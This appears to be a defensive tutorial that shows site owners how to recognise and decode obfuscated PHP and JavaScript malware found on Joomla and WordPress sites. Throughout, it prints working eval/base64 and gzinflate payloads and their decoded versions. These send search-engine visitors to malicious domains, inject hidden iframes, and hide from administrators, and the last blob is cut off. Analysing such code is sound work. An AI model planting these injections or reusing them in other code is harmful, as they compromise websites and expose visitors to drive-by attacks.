$tmp=base64_encode('I am a really malicious line of code!');
to encode the malicious code. Then add the base64_decode function to a sites pages
eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==');
to add the malicious code to the site. While a site owner would instantly be some suspect of
I am a really malicious line of code!
the purpose of the line of code
eval(base64_decode('SSBhbSBhIHJlYWxseSBtYWxpY2lvdXMgbGluZSBvZiBjb2RlIQ==');
is not as clear. While eval(base64_decode('SSBhbSBhIHJlYWx...'); is the most common hackers also use other php functions such as
eval(gzinflate(base64_decode('...');
eval(gzuncompress(base64_decode('...);
eval(gzinflate(str_rot13(base64_decode('...');
eval(gzuncompress(base64_decode('...);
eval(gzinflate(str_rot13(base64_decode('...');
PHP code executes on your server and the results of that execution is inserted into the code that is sent to the users browser. If you open a page in a browser and view the source for the page you will not see the PHP code you will see what ever output is being generated by the script. To find and remove the actual PHP code you will need to edit the files on your server. I have a tool on line at Redleg's PHP base64 Decoder which will decode most base64 encoded stuff.
The following base64 encoded php was found in the homepage, index.php, of a Joomla site but this type of code can be found on any site running php.
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJHRydW09aGVhZGVyc19zZW50KCk7DQokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107DQokdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKHN0cmlzdHIoJHVhLCJtc2llIikpew0KaWYgKCEkdHJ1bSl7DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2FsYXBvdHJlbW5iYS5vc2EucGwvcmlmLyIpOw0KCQlleGl0KCk7DQoJfQ0KCX0NCn1lbHNlIHsNCmVjaG8gIjxpZnJhbWUgc3JjPSdodHRwOi8vcnRqaHRleWp0eWp0eWoub3JnZS5wbC9tZG0vJyBmcmFtZWJvcmRlcj0wIGhlaWdodD0xIHdpZHRoPTEgc2Nyb2xsaW5nPW5vPjwvaWZyYW1lPiI7DQp9DQoJfQ=="));
Which decodes to the following script --
error_reporting(0);
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie"))
{
if (!$trum)
{
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}
else
{
echo "< if rame frameborder="0" height="1" scrolling="no" src="http://rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></iframe>";
}
}
$trum=headers_sent();
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie"))
{
if (!$trum)
{
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: http://alapotremnba.osa.pl/rif/");
exit();
}
}
}
else
{
echo "< if rame frameborder="0" height="1" scrolling="no" src="http://rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></iframe>";
}
}
Now lets take a closer look at the code
error_reporting(0); --> Turns off php error reporting
Note: Anytime you see a php script start with
error_reporting(0); or
error_reporting(E_ERROR | E_WARNING | E_PARSE); or
ini_set('display_errors', "0");
you should be suspicious. These lines of code are used by hackers to turn off php's error reporting.
error_reporting(0); or
error_reporting(E_ERROR | E_WARNING | E_PARSE); or
ini_set('display_errors', "0");
you should be suspicious. These lines of code are used by hackers to turn off php's error reporting.
$trum=headers_sent(); --> sets the variable to true if headers have been sent to requester.
$referer=$_SERVER['HTTP_REFERER']; --> sets the variable to the referring page.
$ua=$_SERVER['HTTP_USER_AGENT']; --> sets the variable to the user agent in the request.
if (stristr($ua,"msie")) --> if the string 'msie' is in the user agent continue, msie is in the user agent for Internet Explorer
if (!$trum) --> headers have not been sent continue
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) --> If the string yahoo, google or bing is in the URL of the referring page, a search results page.
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")) --> The conditional checks if the search operators site:, cache:, or inurl: is in the referring page and if it is the redirect will NOT (!) occur.
header("Location: http://alapotremnba.osa.pl/rif/"); -> this line of code redirects the request to a the malicious location.
exit();
else -$gt; This else goes with the headers sent line, if headers have been sent then trying to redirect would create a php error so instead of redirecting add a malicious hidden iframe to the page.
echo "< if rame frameborder="0" height="1" scrolling="no" src="http:// rtjhteyjtyjtyj . orge . pl/mdm/" width="1"></if rame>"; -> writes the malicious iframe.
The following code examples are common redirects.
base64_decode(\"DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudC gpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRV InXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIH sNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZX IsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJ hbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciw ibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlci wibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSB vciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW5 5dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/ KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3Vy bFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzd HJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJh b2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigk cmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9 wcXcuamt1Yi5jb20vIi k7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==\")
Which writes a conditional redirect
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://www6.uiopqw.jkub.com/"); exit(); }}} } }
header("Location: http://www6.uiopqw.jkub.com/"); exit(); }}} } }
eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFU
kVSXSwiYmluZyIpKSB7DQpwcmVnX21hdGNoICgiL3FcPSguKj8pJi8iLCRfU0VS
VkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjoga
HR0cDovL3Byb3BwZXJhLmNvLmNjLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw
0KfQ0KZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInl
haG9vIikpIHsNCnByZWdfbWF0Y2ggKCIvcFw9KC4qPykmLyIsJF9TRVJWRVJbS
FRUUF9SRUZFUkVSXSwka2spOw0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRw
Oi8vcHJvcHBlcmEuY28uY2MvP3E9Ii4ka2tbMV0pOw0KCQlleGl0KCk7DQp9ZWx
zZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImdvb2dsZSIpK
SB7DQoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udS
IpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5
kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpew0KCQ
lwcmVnX21hdGNoICgiL3FcPSguKikvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLC
Rrayk7DQoJCWlmIChzdHJpc3RyKCRra1sxXSwiJiIpKSB7DQoJCQlwcmVnX21hd
GNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOw0KCQkJJGtleXdvcmQ9dXJsZG
Vjb2RlKCRrZXkyWzFdKTsNCgkJfWVsc2Ugew0KCQkJJGtleXdvcmQ9dXJsZGVjb
2RlKCRra1sxXSk7DQoJCX0NCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3B
yb3BwZXJhLmNvLmNjLz9xPSIuJGtleXdvcmQpOw0KCQlleGl0KCk7DQoJfQ0KDQ
p9"));
if (stristr($_SERVER[http_REFERER],"bing"))
{
preg_match ("/q\=(.*?)&/",$_SERVER[http_REFERER],$kk);
header("Location: http://proppera.co.cc/?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[http_REFERER],"yahoo"))
{
preg_match ("/p\=(.*?)&/",$_SERVER[http_REFERER],$kk);
header("Location: http://proppera.co.cc/?q=".$kk[1]);
exit();
}
elseif (stristr($_SERVER[http_REFERER],"google"))
{
if (!stristr($_SERVER[http_REFERER],".nu")
and !stristr($_SERVER[http_REFERER],"site")
and !stristr($_SERVER[http_REFERER],"inurl"))
{
preg_match ("/q\=(.*)/",$_SERVER[http_REFERER],$kk);
if (stristr($kk[1],"&"))
{
preg_match ("/(.*?)\&/",$kk[1],$key2);
$keyword=urldecode($key2[1]);
}
else
{
$keyword=urldecode($kk[1]);
}
header("Location: http://proppera.co.cc/?q=".$keyword);
exit();
}
}
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZG
Vyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSW
ydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FH
RU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3
RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW
5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0
cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiK
Sl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS
5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
error_reporting(0);
$nccv=headers_sent();
if (!$nccv)
{
$referer=$_SERVER['http_REFERER'];
$ua=$_SERVER['http_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing"))
{
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: http://buyordie.osa.pl/");
exit();
} } }
The following block of code is being found on a lot of WordPress sites. In most cases it has been redirecting search results to uniqtext.com/search.php?theme=[*search query used*]
$md5 = "a5d67011f6466a82320bc9bcbcaab8c5";
$wp_salt = array("n",'(','o',"l","d",'c','r','e','f',"v","$","_",';','g',"z","b",'t','6',")","s",'i','4','a');
$wp_add_filter = create_function('$'.'v',$wp_salt[7].$wp_salt[9].$wp_salt[22].$wp_salt[3].$wp_salt[1].$wp_salt[13].$wp_salt[14].$wp_salt[20].$wp_salt[0].$wp_salt[8].$wp_salt[3].$wp_salt[22].$wp_salt[16].$wp_salt[7].$wp_salt[1].$wp_salt[15].$wp_salt[22].$wp_salt[19].$wp_salt[7].$wp_salt[17].$wp_salt[21].$wp_salt[11].$wp_salt[4].$wp_salt[7].$wp_salt[5].$wp_salt[2].$wp_salt[4].$wp_salt[7].$wp_salt[1].$wp_salt[10].$wp_salt[9].$wp_salt[18].$wp_salt[18].$wp_salt[18].$wp_salt[12]);
$wp_add_filter('FZi3zoaMsYQvx7YoyEmWC3LOmeYIXnLO6erP93c0IK1mdvYZyisb/l1/7VQN2VH+O8/2ksD+ryh/c1H++19i2qLCeiliH4ApgAVMQYau3F32r98uNi45nQSIJNUEGSFKAIBXDd9B06LQ0LORUKbf3KKVjQeHMHgGOqoqyoNqLNYHyk/XnJ73um2b38HtRLjZ86P3WOLwh
...... (and so on) .......
7PaEHk/TSye7MrKqpM1lUCzAjX5NwpW5X803CpCvkTWBYP7paOaRsiz+vr/BOf1F3TchA+ewJGrYPfrzliW6r984ZKT3qdN58EVdA6ZFNrgjTjevu6aExuKs8UE9pUnOYVVWwXWrV4lSe6zyxzR2zSYyCNrXdYEgLd//+9+//vOf//z3/wE=');
On many sites hackers will use some obfuscated php code
eval(gzinflate(base64_decode('3VZNc5swEP0rLRcgTBwkhIAh6qW99NxjJgfHhpp
Mgm1Q6ok94bdXu5IwdmKHZnrodAbLeNndt19vzXU7a6qV/DIX36ayyOeiLjaf5p6fL
8Tlatq0xfdaem5IqOtfxXlVepuqni83k/ly9vRY1NKXzfNO2TjrTeFMVs1SLuXzqniZTe
Vs4a3Xa3+33Qp3+uDm8P3LDbbbvG2F44Az4u9K4ZZu4Dbqs3xUx9fFtHHzUpTq
FmRzdRRu/lIIuajam3LSPt21svEI8ZWr21wK91k9roUTTeIOPjGBI+xI3JGsY1kXMy
VgKUgTOECJZXDHlKSjVGn3oqSL0Elkfh8pxxxQlAWIGOkYegTzKDU/eguFTlKENi
Fk2gyFBB2AmCqo2Eo4uIpNJscZxfwYQkkABW5pemTJwYpYxUiHrgM7gTOuVqnG
1UEl+1R5R7MzoZJYRwBPwAXtSxETrKy6IAuFAU+pNcaI4CF6Tgdt0RFy1B7q9oc
S61SYNdFuuQFFcWrdY2TYlUTXArxqRVWeUKth1BQu7BwcDC8MAw/Wt9h6J6a2i
LLPW5tHe2VikiN2pnRlzlhwE3w2GNlBYVPji/dRWEnU9y/Ww4NYJlC8dM/1VNkS9n76fjCrZqqW
GiVmQJLBkGhfllghppZCOtT2gGmwgRTziEIYLd27k/OllAg/R4WhANF16Cx9Ix8yknRv09VuAo5+
cBPRzJJxBMWYodh+Gm0Jz+4mu2/OcLDfPLpEIc44Hy4/292k5zj0NDniejo5YrMeT/KfE/qtyr2iH0T3h0swdf002Udgfg+Q3uk94k6GvWQy4M1Nd7FgPXv2n9kSF8v4IN
RPdyof4sZJxb5KOQP/Sf/C+8vQM7E/FvsMZVRRAfzjYGBa9iLJ5e1M2lXD5X0nGnn9G98
vp+Xy8arRJhXnwUnJK+CwN/diwreKNs2+CGbqv55U956l4sLj16SgFzUN/e3yvAF3zbXS
gveO7dbv/AcJ1j7+fWVeQP+DQ==');
to write some obfuscated JavaScript
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new'qwe'.prototype}
catch(qqq){zz='al';zz='v'+zz;ss='';if(1){f='f'+'r'+'om'+'Char';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n='3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~
50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~
38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5
~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~
3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~
48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56
~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~
53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~22~
48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~51~55
~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~15~58.5~51.5~49~57~
51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~
18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~
57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~
54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~
57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16
~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~
54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~
47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~
56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~
47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~
48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~
22.5~53.5~54.5~57~51.5~58~49.5~53.5~57.5~56.5~22~53.5~54.5~54.5~54.5~
22~48.5~54.5~53.5~22.5~56.5~51~54.5~58.5~57~51~56~49.5~47.5~49~22~55~
51~55~30.5~57~29.5~25~25.5~23.5~24~24~26.5~26.5~24.5~18.5~19.5~28.5~
50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~
59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~
49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~
53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~
29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~
18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~
19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~
56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~
50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~
48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~
56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~
19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~
28.5~5.5~3.5~3.5~61.5'.split('a~'.substr(1));for(i=0;i!=611;i++){j=i;
ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(''+q);</script>
to add a malicious iframe to the pages on the site.
if (document.getElementsByTagName('body')[0]) {
iframer();
}
else {
document.write("
<iframe src='http://motivemus.mooo.com/showthread.php?t=45122773' width='10' height='10' s
tyle='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://motivemus.mooo.com/showthread.php?t=45122773');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
This is another example of obfuscated script used to insert an iframe but the php is "double" encoded. This is the code you would find in your homepage or one of your common files
eval(gzinflate(base64_decode('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');
When we plug that long string of characters into the decoder we get
if (!isset($frmDs)){ global $frmDs; $frmDs = 1; $ua = $_SERVER['HTTP_USER_AGENT']; if (strpos($ua, 'Windows')!==false&&strpos($ua,'MSIE')!==false){ error_reporting(0); if(strpos(strtolower(@$_SERVER["HTTP_COOKIE"].';'.$_SERVER['REQUEST_URI']),'admin')!==false)$isadm=1; if(isset($isadm)||!isset($_COOKIE['__utmfr']))@setcookie('__utmfr',rand(1,1000),time()+86400*(($isadm)?365:7),'/'); if(!isset($isadm)&&!isset($_COOKIE['__utmfr']))print('<script>'.base64_decode('dHJ5e2RvY3VtZW50LmJvZHktLX1jYXRjaChnZHNnZCl7d3c9d2luZG93O3Y9InYiKyJhbCI7aWYod3cuZG9jdW1lbnQpdHJ5e2RvY3VtZW50LmJvZHk9MTI7fWNhdGNoKGdkc2dzZGcpe2FzZD0wO3RyeXtxPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImRpdiIpO31jYXRjaChxKXthc2Q9MTt9aWYoIWFzZCl7dz17YTp3d30uYTt2PSJlIi5jb25jYXQodik7fX1lPXdbdl07aWYoMSl7Zj1uZXcgQXJyYXkoMTAyLDExNiwxMDgsOTYsMTE2LDEwNCwxMDksMTA3LDMyLDEwMiwxMTIsOTQsNDAsOTYsNDIsOTUsNDEsMTIyLDExMiw5OCwxMTYsMTE2LDExMiwxMDcsMzIsNzYsOTUsMTEzLDEwNCw0NSwxMDAsMTA1LDExMSwxMTAsMTEyLDM3LDc3LDk2LDExNCwxMDEsNDYsMTEzLDk1LDEwNywxMDAsMTEwLDEwNywzNyw0MSw0MSwzOCw5NSw0NSw5Niw0MSw0Niw0MSw0MCw0MSw5NCw1OSwxMjQsMTEsNywxMDIsMTE2LDEwOCw5NiwxMTYsMTA0LDEwOSwxMDcsMzIsMTEzLDExMywzNyw0MSwxMjIsMTEyLDk4LDExNiwxMTYsMTEyLDEwNywzMiw3Niw5NSwxMTMsMTA0LDQ1LDExMiw5NCwxMTAsOTksMTA5LDEwNiw0MCw0MCw0NCwxMTMsMTExLDgyLDExNCwxMTEsMTA1LDEwOSwxMDEsMzcsNTEsNTMsMzksNDMsMTE1LDExNiw5NiwxMTIsMTE2LDExMywxMDMsMTA3LDEwMywzOSw1MSwzOCw1OSwxMjQsMTEsNywxMDUsMTAxLDM4LDEwNyw5NywxMTcsMTAzLDEwMCw5NywxMTUsMTA5LDExMSw0Niw5OCwxMDksMTA4LDEwNywxMDQsOTksNjYsMTEwLDk2LDk2LDEwNSwxMDEsOTksMzksMTIwLDEzLDksNywxMTUsOTcsMTEzLDMwLDExMiwxMTYsMTA5LDEwNyw1OCwxMTQsMTE0LDM4LDM4LDU5LDEyLDgsNiwxMTgsOTYsMTEyLDI5LDExNyw5NiwzMCw1OCwzMiwxMDksOTUsMTE1LDEwNSwxMDIsOTUsMTEzLDExMSwxMTMsNDQsMTE0LDExNSwxMDAsMTEyLDYyLDEwMywxMDAsMTA4LDExMyw1OSwxMiw4LDYsMTA1LDEwMSwzOCwxMTQsOTcsNDUsMTAzLDEwNywxMDAsMTAwLDExOCw3NiwxMDIsMzksMzcsODQsMTA1LDEwOSw5OCwxMDgsMTE5LDExNCwzNywzOCwzMyw2MCw0Myw0NiwzMiwzNywzNiwyOSwxMTcsOTYsNDQsMTAyLDExMCw5OSw5OSwxMTcsNzksMTAxLDM4LDM2LD